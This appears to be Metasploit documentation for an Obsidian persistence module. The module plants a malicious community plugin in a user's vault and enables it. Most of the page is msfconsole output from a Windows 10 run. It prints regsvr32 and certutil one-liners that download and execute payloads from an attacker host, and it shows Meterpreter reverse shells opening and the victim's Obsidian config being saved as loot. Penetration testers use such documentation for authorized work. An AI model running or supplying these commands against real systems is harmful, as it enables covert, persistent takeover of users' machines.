adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/multi/persistence/obsidian_plugin.md
T
h00die 5c1673bb20 update obsidian to persistence mixin
2025-09-06 15:05:21 -04:00

126 lines
5.3 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module searches for Obsidian vaults for a user, and uploads a malicious
community plugin to the vault. The vaults must be opened with community
plugins enabled (NOT restricted mode), but the plugin will be enabled
automatically.
Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and 1.8.4 on Windows 10.
### Debugging
To open the console (similar to chrome), use `ctr+shift+i`.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Get a user shell on the target
4. Do: `use multi/persistence/obsidian_plugin`
5. Do: Select a shell which will work on your target OS
6. Do: `run`
7. You should get a shell when the target user opens the vault without restricted mode.
## Options
### NAME
Name of the plugin. Defaults to being randomly generated.
### USER
The user to target. Defaults the user the shell was obtained under.
### CONFIG
Config file location on target. Defaults to empty which will search the default locations.
## Scenarios
### Obsidian 1.8.4 on Windows 10
Get a user shell.
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 3
target => 3
resource (/root/.msf4/msfconsole.rc)> set srvport 8282
srvport => 8282
resource (/root/.msf4/msfconsole.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4646
lport => 4646
resource (/root/.msf4/msfconsole.rc)> set URIPATH w
URIPATH => w
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4646
[*] Using URL: http://111.111.1.111:8282/w
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://111.111.1.111:8282/w.sct scrobj.dll
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.222.2.22 web_delivery - Handling .sct Request
[*] 222.222.2.22 web_delivery - Powershell command length: 3696
[*] 222.222.2.22 web_delivery - Delivering Payload (3696 bytes)
[*] Sending stage (203846 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4646 -> 222.222.2.22:50125) at 2025-02-17 09:00:05 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/obsidian_plugin
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/obsidian_plugin) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(C:\Users\windows) > getuid
Server username: WIN10PROLICENSE\windows
(Meterpreter 1)(C:\Users\windows) > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
(Meterpreter 1)(C:\Users\windows) > background
[*] Backgrounding session 1...
```
Persistence
```
[msf](Jobs:1 Agents:1) exploit(multi/persistence/obsidian_plugin) > set payload payload/cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/obsidian_plugin) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://111.111.1.111:8080/xCXtwaKhxivsa8DBsy06mQ %TEMP%\MvboVJyBQSJ.exe & start /B %TEMP%\MvboVJyBQSJ.exe
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/obsidian_plugin) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /xCXtwaKhxivsa8DBsy06mQ
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using plugin name: kuCPva
[*] Target User: windows
[*] Found user obsidian file: C:\Users\windows\AppData\Roaming\obsidian\obsidian.json
[+] Found open vault 73fefafd47723a1b: C:\Users\windows\Desktop\this_is_my_vault
[*] Uploading plugin to vault C:\Users\windows\Desktop\this_is_my_vault
[*] Uploading: C:\Users\windows\Desktop\this_is_my_vault/.obsidian/plugins/kuCPva/main.js
[*] Uploading: C:\Users\windows\Desktop\this_is_my_vault/.obsidian/plugins/kuCPva/manifest.json
[*] Found 4 enabled community plugins (AHBk, CbJt, tjPCOxub9, UOQEhHOR)
[+] Config file saved in: /root/.msf4/loot/20250217091115_default_222.222.2.22_obsidian.communi_029034.txt
[*] adding kuCPva to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20250217.1116/WIN10PROLICENSE_20250217.1116.rc
[*] Client 222.222.2.22 requested /xCXtwaKhxivsa8DBsy06mQ
[*] Sending payload to 222.222.2.22 (Microsoft-CryptoAPI/10.0)
[*] Client 222.222.2.22 requested /xCXtwaKhxivsa8DBsy06mQ
[*] Sending payload to 222.222.2.22 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:50145) at 2025-02-17 09:11:41 -0500
```
Reference in New Issue View Git Blame Copy Permalink